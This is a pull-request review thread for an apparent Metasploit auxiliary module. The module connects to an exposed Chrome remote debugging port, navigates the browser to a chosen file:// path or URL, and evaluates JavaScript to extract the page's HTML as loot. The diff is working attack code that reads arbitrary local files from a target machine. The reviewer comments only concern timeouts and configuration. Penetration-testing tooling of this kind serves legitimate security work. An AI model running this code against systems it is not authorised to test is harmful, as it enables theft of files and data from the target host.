modules/auxiliary/gather/chrome_debugger.rb

```
@@ -0,0 +1,112 @@
+
+    deregister_options('Proxies')
+  end
+
+  def run
+
+    if datastore['FilePath'].empty? and datastore['Url'].empty?
+      print_error('Must set FilePath or Url')
+      return
+    end
+
+    res = send_request_cgi({
+        'uri' => '/json',
+        'method' => 'GET',
+    })
+
+    if res.nil?
+      print_error('Bad Response')
+    else
+      data = JSON.parse(res.body).pop
+      EM.run {
+        file_path = datastore['FilePath']
+        url = datastore['Url']
+
+        if file_path
+          fetch_uri = "file://#{file_path}"
+        else
+          fetch_uri = url
+        end
+        print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
+
+        driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
+
+        driver.on :open do |event|
+          print_status('Opened connection')
+          id = rand(1024 * 1024 * 1024)
+
+          EM::Timer.new(1) do
+            print_status("Attempting to load url #{fetch_uri}")
+            driver.send({
+              'id' => id,
+              'method' => 'Page.navigate',
+              'params' => {
+                'url':  fetch_uri,
+              }
+            }.to_json)
+          end
+
+          EM::Timer.new(3) do
+            print_status('Sending request for data')
+            driver.send({
+              'id' => id + 1,
+              'method' => 'Runtime.evaluate',
+              'params' => {
+                'expression' => 'document.documentElement.outerHTML'
+              }
+            }.to_json)
+          end
+        end
+
+        driver.on :message do |event|
+          print_status("Received Data")
+
+          data = JSON.parse(event.data)
+
+          if data['result']['result']
+            print_good('Retrieved resource')
+            store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+          end
+        end
+
+        EM::Timer.new(10) do
```

This expects that all actions will complete in 10 seconds.  Would it make sense to adjust this to wait for a completion lock or something encase an event takes longer than expected such as a large download response?

If adjusted the lock checkout would also need to take into account if `webSocketDebuggerUrl` had been found earlier.

---

I decided to make this a configuration option.  Let me know if that is ok

---

Option looks good, one more nit pick added as new comment based on time possibly resulting in silent failure.